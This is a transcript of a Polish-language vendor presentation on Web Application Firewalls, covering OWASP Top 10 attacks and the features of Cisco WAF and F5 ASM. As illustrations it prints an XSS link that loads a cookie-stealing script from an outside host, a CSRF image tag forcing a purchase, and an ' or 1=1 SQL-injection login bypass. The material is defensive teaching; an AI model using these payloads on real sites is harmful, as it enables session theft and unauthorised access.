WAF (Web Application Firewall)

Podobne dokumenty
Architektura bezpiecznych aplikacji internetowych na platformie Java Enterprise Edition. Jakub Grabowski Warszawa,

Zagrożenia związane z udostępnianiem aplikacji w sieci Internet

Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework

OWASP. The Open Web Application Security Project. OWASP Top rc1. Dziesięć najbardziej krytycznych zagrożeń w web aplikacjach

Aplikacje webowe na celowniku. Leszek Miś IT Security Architect RHCA,RHCSS,Sec+ Linux Polska Sp. z o.o. 1

Web Application Firewall - potrzeba, rozwiązania, kryteria ewaluacji.

Ataki na aplikacje WWW. Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW

Portal Security - ModSec Enterprise

Wprowadzenie do kryptografii i bezpieczeństwa. Po raz czwarty

The OWASP Foundation Session Management. Sławomir Rozbicki.

Analiza skuteczności zabezpieczeń przed atakami na aplikacje Web

OWASP OWASP. The OWASP Foundation Cross-Site Scripting. Ryzyko do zaakceptowania? Warszawa, 27 stycznia 2011 Michał Kurek

Drobne błędy w portalach WWW

Bezpieczeństwo aplikacji internetowych

Aspekty bezpieczeństwa aplikacji internetowych

Narzędzia OWASP dla developerów OWASP ESAPI & AppSensor OWASP The OWASP Foundation

Jarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne

Bezpieczeństwo systemów komputerowych

Hosting WWW Bezpieczeństwo hostingu WWW. Dr Michał Tanaś (

INSTYTUT IMMUNOLOGII I TERAPII DOŚWIADCZALNEJ im. Ludwika Hirszfelda Polska Akademia Nauk

Jak bezpieczne są Twoje dane w Internecie?

Open(Source) Web Application Security Project

Palo Alto firewall nowej generacji

CYBEROAM Unified Treatment Management, Next Generation Firewall

POLITYKA PRYWATNOŚCI ORAZ POLITYKA PLIKÓW COOKIES W Sowa finanse

Usługi sieciowe systemu Linux

Bezpieczeństwo aplikacji internetowych. Rozwój napędzany potrzebą WALLF Web Gateway. Leszek Miś, RHCA,RHCSS,Sec+ Linux Polska Sp. z o.o.

6. Bezpieczeństwo przy współpracy z bazami danych

Zagrożenia trywialne. Zagrożenia bezpieczeństwa aplikacji internetowych. Parametry ukryte. Modyfikowanie parametrów wywołania

ActiveXperts SMS Messaging Server

Tworzenie witryn internetowych PHP/Java. (mgr inż. Marek Downar)

Kompleksowe zabezpieczenie współczesnej sieci. Adrian Dorobisz inżnier systemowy DAGMA

11. Autoryzacja użytkowników

Opis Przedmiotu Zamówienia na przeprowadzenie testów bezpieczeństwa systemu wspomagania nadzoru archiwalnego e-nadzór

Program szkolenia: Bezpieczny kod - podstawy

Aspekty bezpieczeństwa sieci i aplikacji w CPD Grzegorz Wróbel

Zdalne logowanie do serwerów

Projektowani Systemów Inf.

OWASP i Top 10 Sposób tworzenia Top 10 Czym jest a czym NIE jest Top 10? Zmiany w wersji 2013 Omówienie nowych podatności na liście Podsumowanie

24/10/2011 Norma bezpieczeństwa PCI DSS. Korzyści i problemy implementacji. 1

Sprawozdanie nr 4. Ewa Wojtanowska

Bazy danych 2. Wykład 1

Opis Przedmiotu Zamówienia

Połączenie VPN Host-LAN SSL z wykorzystaniem przeglądarki. 1. Konfiguracja serwera VPN 1.1. Ustawienia ogólne 1.2. Konto SSL 1.3. Grupa użytkowników

9. System wykrywania i blokowania włamań ASQ (IPS)

SQL z perspektywy hakera - czy Twoje dane są bezpieczne? Krzysztof Bińkowski MCT,CEI,CEH,ECSA,ECIH,CLFE,MCSA,MCSE..

Zarządzanie sesją w aplikacjach Internetowych. Kraków, Paweł Goleń

Cookie Policy. 1. Informacje ogólne.

Uwaga!!! Autentykacja LDAP/AD zaimplementowana w Vigor wspiera tylko proste uwierzytelnianie (hasło przesyłane jest jawnym tekstem).

DOKUMENTACJA TECHNICZNA SMS API MT

ZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja

Szczegółowa specyfikacja funkcjonalności zamawianego oprogramowania.

Windows W celu dostępu do i konfiguracji firewall idź do Panelu sterowania -> System i zabezpieczenia -> Zapora systemu Windows.

Kurs OPC S7. Spis treści. Dzień 1. I OPC motywacja, zakres zastosowań, podstawowe pojęcia dostępne specyfikacje (wersja 1501)

Dokumentacja techniczna. Młodzieżowe Pośrednictwo Pracy

Połączenie VPN aplikacji SSL. 1. Konfiguracja serwera VPN 1.1. Ustawienia ogólne 1.2. Profile aplikacji SSL 1.3. Konto SSL 1.4. Grupa użytkowników

Dokumentacja smsapi wersja 1.4

Przepełnienie bufora. SQL Injection Załączenie zewnętrznego kodu XSS. Nabycie uprawnień innego użytkownika/klienta/administratora

Client-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl

Agenda. Quo vadis, security? Artur Maj, Prevenity

WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.

Wszystkie parametry pracy serwera konfigurujemy w poszczególnych zakładkach aplikacji, podzielonych wg zakresu funkcjonalnego.

Szczegółowe informacje dotyczące przekazywania do Bankowego Funduszu Gwarancyjnego informacji kanałem teletransmisji

MONITOROWANIE WINDOWS Z NETCRUNCHEM 7 P A G E 1

Panda Managed Office Protection. Przewodnik. Panda Managed Office Protection. Przewodnik

4. Podstawowa konfiguracja

OCHRONA PRZED RANSOMWARE

Projektowanie bezpieczeństwa sieci i serwerów

OCHRONA PRZED RANSOMWARE. Konfiguracja ustawień

Oracle Application Express -

Instrukcja konfigurowania poczty Exchange dla klienta pocztowego użytkowanego poza siecią uczelnianą SGH.

Serwer SSH. Wprowadzenie do serwera SSH Instalacja i konfiguracja Zarządzanie kluczami

oprogramowania F-Secure

Plan. Wprowadzenie. Co to jest APEX? Wprowadzenie. Administracja obszarem roboczym

Autorytatywne serwery DNS w technologii Anycast + IPv6 DNS NOVA. Dlaczego DNS jest tak ważny?

E-commerce. Genialnie proste tworzenie serwisów w PHP i MySQL.

WYMAGANE PARAMETRY TECHNICZNE OFEROWANYCH URZĄDZEŃ ZABEZPIECZAJĄCYCH

DLP i monitorowanie ataków on-line

Spis treści. Dzień 1. I Wprowadzenie (wersja 0906) II Dostęp do danych bieżących specyfikacja OPC Data Access (wersja 0906) Kurs OPC S7

Bezpieczne strony WWW dla edukacji, organizacji non-profit i uŝytkowników indywidualnych.

Xopero Backup Build your private cloud backup environment. Rozpoczęcie pracy

Cemarol Sp. z o.o. Polityka prywatności (pliki cookies) 1. Informacje ogólne.

Języki programowania wysokiego poziomu. Ćwiczenia

Zakres tematyczny dotyczący kursu PHP i MySQL - Podstawy pracy z dynamicznymi stronami internetowymi

Systemy internetowe. Wykład 5 Architektura WWW. West Pomeranian University of Technology, Szczecin; Faculty of Computer Science

Kurs rozszerzony języka Python

Webapplication Security Pentest Service

Wojciech Dworakowski. Zabezpieczanie aplikacji. Firewalle aplikacyjne - internetowych

Połączenie VPN SSL Web Proxy. 1. Konfiguracja serwera VPN 1.1. Ustawienia ogólne 1.2. Profile SSL Web Proxy 1.3. Konto SSL 1.4. Grupa użytkowników

Rejestracja użytkownika Bentley Często zadawane pytania techniczne

Budowa aplikacji ASP.NET z wykorzystaniem wzorca MVC

INTERNET - Wrocław Usługi bezpieczeństwa w rozproszonych strukturach obliczeniowych typu grid

Sieci komputerowe i bazy danych

Deduplikacja danych. Zarządzanie jakością danych podstawowych

Wykład 3 / Wykład 4. Na podstawie CCNA Exploration Moduł 3 streszczenie Dr inż. Robert Banasiak

Typy przetwarzania. Przetwarzanie zcentralizowane. Przetwarzanie rozproszone

Laboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark

Konfiguracja zapory Firewall w systemie Debian.

Transkrypt:

WAF (Web Application Firewall) Mariusz Sawczuk mariusz.sawczuk@solidex.com.pl niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań

Ekspansja usług internetowych Coraz więcej usług dostępnych jest przez internet: Klienci, Partnerzy biznesowi, Pracownicy, itd. Coraz więcej urządzeń korzysta z zasobów internetowych: Komórki, PDA, IP phone y, drukarki itp. Istotne kwestie: Aplikacje internetowe mogą być potencjalnym celem ataków Nawet usługi korzystające z protokołu SSL akceptują żądania HTTP bez kontroli 2

Typowa architektura aplikacji internetowej Warstwa Sieci Warstwa Aplikacji Firewall Kod aplikacji napisany przez firmę trzecią Aplikacyjny Serwer Porty 80 i 443 są otwarte Web Serwer Firewall Baza danych (np. MySQL, PostgreSQL) 3

Istota ataku na aplikacje internetowe Warstwa Sieci Warstwa Aplikacji Niefiltrowane dane Firewall Ogromne dziury w aplikacjach Kod aplikacji napisany przez firmę trzecią Aplikacyjny Serwer Porty 80 i 443 są otwarte Web Serwer 75% ataków zdarza się tutaj Firewall Baza danych (np. MySQL, PostgreSQL) Tradycyjne zabezpieczenia sieciowe nie są świadome ataków na aplikacje webowe 4

Dlaczego to takie proste? Sieć z definicji pracuje w innej warstwie i nie jest świadoma aplikacji nie ma magicznych sygnatur na IPSy, reguł na FW, patchy, dla napisanych na indywidualne potrzeby Klienta PHP skryptów Programiści to tylko ludzie: popełniają błędy mają swoje nawyki Internet to relatywnie anonimowe medium Narzędzie służące do ataku: przeglądarka Sieć Oprogramowanie? Dane 5

Dlaczego po prostu nie poprawić błędów w aplikacjach? Każde 1000 linii kodu zawiera średnio 15 krytycznych luk bezpieczeństwa (US Dept of Defense) Średnio, aplikacje biznesowe składają się z 150.000-250.000 linii kodu (Software Magazine) Średnio, diagnoza luki bezpieczeństwa w kodzie zajmuje 75 min, a naprawa 6 godzin (na podstawie pięcioletnich badań Pentagonu) Developerzy skupiają się na rozwoju nowych funkcjonalności a nie usuwaniu błędów Usuwanie luk bezpieczeństwa w aplikacjach jest kosztowne! 6

PCI-DSS 6.5 i 6.6 PCI-DSS (Payment Card Industry Data Security Standard) to standard opisujący koniecznie zabezpieczenia przy transakcjach kartami płatniczymi Jego dwie sekcje: 6.5 i 6.6 koncentrują się na bezpieczeństwie aplikacji internetowych Sekcja 6.6 obliguje do zainstalowania WAF (Web Application Firewalla) do końca czerwca 2008, aby chronić swoje aplikacje przed atakami OWASP top 10 7

Najważniejsze luki w zabezpieczeniach aplikacji Web Lista ataków OWASP - Top 10 (v 2007) OWASP = Open Web App Security Project Cross site scripting (XSS) Injection Flaws Malicious file execution Insecure direct object reference Cross site request forgery (CSRF) Information leakage and improper error handling Broken auth. and session management Insecure cryptographic storage Insecure communication Failure to restrict URL access 8

Najważniejsze luki w zabezpieczeniach aplikacji Web WHID (Web Hacking Incidents Databse) http://www.xiom.com/whid Źródło: WhiteHat Security 9

Atak #0 Unvalidated input (protoplasta wszystkich web ataków) niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań

Atak #0 - Unvalidated input Przyczyna: Efekt: Webowe aplikacje używają parametrów by pobrać informacje od klientów Developerzy skupiają się na poprawnych wartościach parametrów i jak powinny one być przetworzone Zbyt duże zaufanie dla informacji wpisywanych przez klienta w przeglądarce Niewiele uwagi poświęca się nieprawidłowym wartościom parametrów Aplikacja postępuje zgodnie ze 'zmienionymi' informacjami, potencjalnie dając dostęp do kont użytkowników, tajnych danych, itp. Protoplasta dwóch najpopularniejszych ataków (XSS i SQL Injection) Często maskowany za pomocą technik kodowania - http://ha.ckers.org/xss.html Przykład: Manipulowanie parametrami: exploit Shopping Cart Kilka narzędzi do przeglądarek, zaczynając od pluginów, a kończąc na pełnych proxy): Paros, Suru, Burp Suite, WebScarab 11

Atak #0 - Unvalidated input 12

Atak #0 - Unvalidated input - kodowanie W HTML mamy: charsets (zestawy znaków) encoding (kodowanie sposób transformacji znaków na bity) Najpopularniejszy jest kod ASCII (128 znaków). Niestety za jego pomocą nie można przedstawić wszystkich znaków występujących we wszystkich językach świata HTML z tego powodu używa Unicode u (1000 znaków) Rodzaj kodowania może być niezdefiniowany, wówczas może być używane dowolne kodowanie Z kodowaniem Parametr "charset" określa kodowanie znaków, tzn. metodę konwersji sekwencji bajtów na sekwencję znaków. Jeżeli zestaw znaków nie jest zdefiniowany, serwer nie może określić, które znaki są specjalne dla niego. Bez kodowania 13

Atak #0 - Unvalidated input - kodowanie Problem: RFC 1738: Tylko znaki alfanumeryczne [0-9a-zA-Z], znaki specjalne $-_.+!*() oraz znaki zarezerwowane (np. &) mogą być użyte w adresie URL HTML z drugiej strony umożliwia użycie całej palety znaków z Unicodu Normalizacja Polityka Deszyfracja SSL Kanonizacja URL powstrzymuje ataki wykorzystujące kodowanie URLi 14

Atak #1 XSS (Cross-Site Scripting) Wstrzykiwanie kodu PHP, JavaScript do URLa niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań

Atak #1: XSS (Cross-Site Scripting) Przyczyna: Efekt: User wpisuje dane do aplikacji webowej za pośrednictwem przeglądarki Aplikacja webowa nie sprawdza wpisywanych danych i informacji zwracanych na zapytanie generowane przez użytkownika Niesprawdzone dane zawierają skrypt (np. JavaScript), który jest wykonywany w ramach sesji przeglądarki użytkownika. Celem ataku jest użytkownik, nie aplikacja internetowa! Kradzież tożsamości (kradzież sesji HTTP, export cookie) Kompromitacja bezpieczeństwa przeglądarki kontrola przez hackera Przejęcie pełnej kontroli nad stacją użytkownika Trzy typy ataków XSS: Reflected (Non-Persistent) Stored (Persistent): Hackerzy instalują kod XSS w bazie danych (via a form for instance). Każda wizyta na stronie powoduje wykonanie kodu XSS przykład MySpace.com DOM based (Loacal) 16

Atak #1: XSS (Cross-Site Scripting) Kradzież tożsamości Atakujący http://bock-bock/cgi-bin/power/?q= <script src=http://www.employees.org/~pag/xss/ cookie_theft.js></script> 1) Atakujący wysyła spreparowany link do Ofiary przez Email lub HTTP 4) Skrypt wysyła cookie i informacje o sesji Ofiary (bez jej wiedzy) do Atakującego 5) Atakujący używa skradzionych informacji o sesji by przedstawić się jako Ofiara 2) Ofiara wchodzi na właściwą stronę i jednocześnie wykonywany jest ukryty skrypt 3) Zwracane są dane z procesu autentykacji Ofiara Aplikacja internetowa 17

Atak #1: XSS (Cross-Site Scripting) - Przykład PayPal z szyfrowanym dostępem SSL (2006) i MySpace.com 18

Atak #2 CSRF (Cross-Site Request Forgery) niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań

Atak #2: CSRF (Cross-Site Request Forgery) Opis: Podczas gdy XSS wykorzystuje zaufanie użytkownika na stronie internetowej, to CSRF wykorzystuje zaufanie do witryny sieci Web którą posiada użytkownik przez podrobienie requestu zaufanego użytkownika Występuje pod kilkoma nazwami: Session Riding, XSRF, One-Click Attack, Hostile Linking, Automation Attack Przyczyna: Ofiara loguje się na stronie banku Ofiara w tym samym czasie chatuje i jest zalogowana na blogu Atakujący wpisuje komentarz na blogu zapraszając Ofiarę żeby kliknęła na link. Ofiara nie musi wcale kliknąć na link, wystarczy przecież umieścić obrazek <imgsrc="http://example.org/buy.php?item=ps3&qty=500> Link wykonuje działanie na stronie banku Ofiary Tak długo jak Ofiara jest zalogowana, atak może się powieść 20

Atak #2: CSRF (Cross-Site Request Forgery) Obrona: Nie jest trywialna, nie ma narzędzia typu one-stop-solution Kilka rozwiązań po stronie serwera Wymuszenie autoryzacji tokenami, które nie są automatycznie akceptowane przez przeglądarkę Eliminacja zagrożeń XSS z serwerów aplikacyjnych Używaj analizy obrazkowej (CAPTCHA) Z perspektywy WAFa implementacja sprawdzenia nagłówka zniechęci niektórych hackerów ale nie jest to wystarczające gdy nagłówek może być podspoofowany 21

Atak #3 SQL Injection Wstrzykiwanie zapytań SQL do URLa niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań

Atak #3: SQL Injection - Przykład Co się stanie jak w pole formularza wpiszemy pojedynczy cudzysłów: ' 23

Atak #3: SQL Injection - Przykład 24

Atak #3: SQL Injection SQL (Structured Query Language) jest standardem umożliwiającym aplikacjom pobieranie informacji z bazy danych. Za pomocą SQL można: wykonywać zapytania do bazy danych pobierać dane z bazy (SELECT) wstawiać nowe rekordy do bazy (INPUT)) usuwać rekordy z bazy (DELETE) aktualizować rekordy w bazie (UPDATE) Typowe zapytanie SQL przy logowaniu: SELECT * FROM users WHERE login = jerry' AND password = '123 Typowy kod w skrypcie, który wykonuje powyższe zapytanie: var sql = "SELECT * FROM users WHERE login = '" + form_user + "' AND password = '" + form_pwd + "'"; 25

Atak #3: SQL Injection Apostrof mały niepozorny znak, z ogromnymi możliwościami Wpisujemy (wstrzykujemy) poniższy kod do formularza za pomocą apostrofu: form_user =' or 1=1 form_pwd = cokolwiek W efekcie wykonując poniższe zapytanie: SELECT * FROM users WHERE login ='' or 1=1 AND password = cokolwiek'... dzięki któremu zalogowaliśmy się do systemu... Komentarz SQL Do ataku można wykorzystywać także znaki ) > \ itd. Zawsze prawda! 26

Omówienie funkcjonalności rozwiązań WAF (Web Application Firewall) na podstawie Cisco WAF niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań

Cisco WAF Cisco WAF zbudowany na bazie AXG (ACE XML Gateway) - XML firewalla Produkt pojawił się w maju 2008 wraz z softem AXG 6.0 Wydajność appliance a Cisco Inspekcja do 9.000 HTTP na sec, 30.000 jednoczesnych sesji i do 1GB ruchu Sprzedawany jako licencja (również na moduł ACE do cat6500) i jako appliance: 28

Cisco WAF Licencjonowanie, ceny Są licencje na Gateway i na Managera (zarządzanie Cisco WAF Gateway) Jeden Manager może zarządzać kilkoma Cisco WAF Gatewayami Można połączyć funkcjonalność Managera i Gatawya na jednym appliance ie (również na module ACE). Nie jest to wspierane przez support jeszcze. FIPS HW ACE-XML-K9 (FIPS) + ACE-XML-FIPS ACE-XML-NF-K9 + ACE-XML-NONFIPS Non FIPS HW ACE-WAF-GAT-LICFX ACE-WAF-MGT-LICFX Licencje na WAF (oddzielne na gatway i Managera) 29

Cisco WAF modele wdrożeniowe Cisco WAF to Revers Proxy: Sprawdza zapytanie klienta (analizuje pod względem bezpieczeństwa) i jeżeli jest ok., to przekierowuje do właściwego serwera HTTP. Zazwyczaj wymagana jest rekonfiguracja DNS i wskazanie klientom jako adresu IP serwera WWW adresu Cisco WAF Cisco WAF nie posiada wbudowanych mechanizmów zapewniających redundancję. Redundancję można osiągnąć przez: Zewnętrzny Load Balancer: Cisco ACE, F5 BIG-IP SLB (Server Load Balancing): funkcjonalność dostępna na Cisco (routery, switche) z odpowiednim IOS Cisco WAF nie wspiera innego ruchu poza HTTP (HTML, XML). Jeżeli otrzyma ruch typu: SSH, FTP, itp. odrzuci go. To sprawia że bardzo istotne jest aby selektywnie przekierować ruch do WAF. 30

Cisco WAF modele wdrożeniowe Klienci DMZ Data Center Internet Load Balancer (np. ACE, CSS) HTML HTML/XML Chronione aplikacje WWW ACE Web Application Firewall ACE WAF Manager Klienci wysyłają żądanie na adres strony WWW, który jest adresem wirtualnym (VIP) na load balancerach (LB) LB wybiera odpowiedniego WAFa i przekierowuje do niego zapytanie WAF analizuje zapytanie Jeżeli jest ok. to przesyła żądanie na adres innej grupy VIP na LB LB wybiera właściwy serwer WWW i wysyła do niego żądanie 31

Cisco WAF terminologia Chronione aplikacje nazywane są wirtualnymi aplikacjami webowymi Są one grupowane na podstawie dowolnych kryterii (np. aplikacje produkcyjne, testowe etc.) Punkty kontrolne przypisywane są do aplikacji za pomocą profili (pojedyncza aplikacja może mieć przypisany jeden profil. Jeden profil może być skojarzony z wieloma aplikacjami) Parametry związane z inspekcją treści, będącą składową profilu, nazywane są regułami i odnoszą się do sygnatur Cisco WAF domyślnie normalizuje ruch HTTP (do UTF-8) nim przystąpi do inspekcji 32

Cisco WAF - Profile Cisco WAF to nie tylko sygnatury ataków. Dla każdego profilu można kreować politykę w ramach trzech sekcji Sekcja Sekcja aktywnego bezpieczeństwa Zmiana wybranej treści treści w komunikacji pomiędzy klientem i i serwerem Analiza Analiza ruchu ruchu za za pomocą sygnatur 33

Cisco WAF Header Processing Active Security: Header Processing - maskowanie wersji serwera WWW Odpowiedź wysłana w nagłówku HTTP HTTP 34

Cisco WAF Cookie Security Active Security: Cookie Security - podpisywanie i szyfrowanie ciasteczek odbywa się w HARDWARZE Klient CP_EN7a989b1f1b9e966e47d629eec63302d 3571d1677b27fe1bebba48df648b2edc= expires=mon, 15-Dec-2006 1:03:00 GMT; path=/; domain=.cisco.com; secure Po Po zaszyfrowaniu Cisco WAF Web Server sess1=1800; expires=mon, 15-Dec-2006 1:03:00 GMT; path=/; domain=.google.com; secure 35

Cisco WAF Ochrona Overflow, DoS Active Security: Data Overflow Defense ochrona aplikacji przed atakami typu Buffer Overflow, DoS 36

Cisco WAF - DLP Message Rewrite: maskowanie odpowiedzi z serwera jako element DLP maskowanie numerów kart kredytowych) (np. Reguła Reguła użyta użyta to to nadpisania: nadpisania: Operator=rewrite Operator=rewrite SigGroup=CreditCardNN 37

Cisco WAF - DLP Remapowanie komunikatów błędów serwera WWW Z 2 na 5 aplikacji webowych w internecie następuje wyciek informacji Źródło: http://www.whitehatsec.com/home/assets/wpstats032408.pdf Często wynikiem pracy aplikacji, nie potrafiącej dać sobie rady np. z nieprzewidywalnym parametrem jest wyświetlenie danych, które nie powinny być wyświetlane! Remapuj z 500 500 do do200 38

Cisco WAF Message Inspection Message Inspection: Włączenie reguły (sygnatury) anty XSS poziom poziom inspekcji XSS XSS Co Co zrobić zrobić z wykrytym XSS XSS 39

Cisco WAF HaL Większość rozwiązań typu WAF posiada umiejętność dynamicznego uczenia aplikacji, tzw. site learning. WAF dynamicznie buduje profile zachowań i wykorzystania aplikacji, które później będzie chronił Problemy związane z dynamicznym uczeniem: Zajmuje czas, średnio 2-3 tygodnie. W tym czasie nie ma ochrony Po jego wyłączeniu, nie można włączyć go ponownie Jak odizolować czysty ruch od ataków? Żmudne przeglądanie logów Cisco HaL = Cisco Human Assisted Learning HaL nie uczy się aplikacji, tylko pokazuje, które sygnatury wzbudziłyby się gdyby były włączone w trybie blokowania. HaL integruje daje plusy dynamicznego uczenia i usuwa konieczność zgadywania. W event logu można stworzyć wyjątek (modifier) Tworzenie wyjątków to to serce serce HaLa HaLa 40

Cisco WAF We are under attack Natychmiastowe powiadomienie o atakach 41

Cisco WAF We are under attack Dowiedzmy się trochę szczegółów na temat ataku ID ID sygnatury która która się się wzbudziła Nazwa Nazwa wektora ataku ataku 42

Cisco WAF We are under attack Więcej, więcej...szczegółów Pełna Pełna analiza analiza przychodzącego żądania (ataku) (ataku) 43

F5 WAF ASM (Application Security Manager) niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań

F5 WAF - ASM F5 jest liderem na rynku Load Balancerów Sztandarowy produkt to rodzina urządzeń F5 BIG-IP. Jest to platforma bardzo dobrze dopracowana platforma, na której można uruchomić: Load balancing Kompresję SSL Offloading WAF Firma F5 oferuje dwa rozwiązania typu WAF: ASM (Application Security Manager), który zapewnia pełną ochronę typu WAF PSM (Policy Security Manager) jest okrojoną wersją ASM. Sprawdza zgodność zapytań z RFC. Realizuje więc jedynie ochronę protokołu, a nie aplikacji). ASM daje dwustopniową ochronę Pierwszą linię ochrony stanowią sygnatury Drugą, stanowią zaawansowane metody blokowania wynikające z faktu iż ASM poznał budowę aplikacji (site learning). Na taj podstawie ma opisane wszystkie wartości obiektów i wie jakie parametry mogą przyjmować, więc ich zmiana to będzie atakiem. ASM zabezpiecza przed wszystkimi atakami OWASP top 10 45

F5 WAF ASM: modele wdrożeniowe W odróżnieniu od Cisco (poza modułem ACE do cat6500) rozwiązanie F5 umożliwia uruchomienie funkcji load balansujących i WAF na jednym urządzeniu! Obsługiwana jest oczywiście redundancja Web Serwery Internet Firewall BIG-IP z ASM Management Access (przeglądarka) 46

F5 WAF ASM GUI 47

F5 WAF - ASM Integrated Application Security Live Policy Builder Complete with Staging Environment XML Firewall Validated Application Security Policy Templates OWA, SharePoint, etc Live Signature Update Service Anti-Evasion Engine, etc Predefiniowalne Polityki Integrated Application Intelligence 48

WAF - Podsumowanie niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań

Podsumowanie 50

Podsumowanie WAF to jedyne urządzenie sieciowe, które w logiczny i czytelny sposób potrafi poinformować dział sieciowy/bezpieczeństwa o aplikacjach i atakach na nie! Rozwiązania typu WAF nie zapewnią totalnego bezpieczeństwa ochranianym aplikacjom. Problem leży w aplikacjach i tam błędy powinny być usuwane. Jednakże, załóżmy, że po audycie bezpieczeństwa ujawnionych zostaje 100 błędów. Powiedzmy że WAF jest w stanie zapobiec wykorzystaniu 85 z nich. Zyskujesz czas i możesz skupić się na usunięciu pozostałych 15. Rozwiązania typu WAF są świetnym narzędziem typu Virtual Patchtool dla aplikacji. 51

Dziękuję Mariusz Sawczuk mariusz.sawczuk@solidex.com.pl niezawodna komunikacja poufność danych bezpieczeństwo infrastruktury mobilność rozwiązań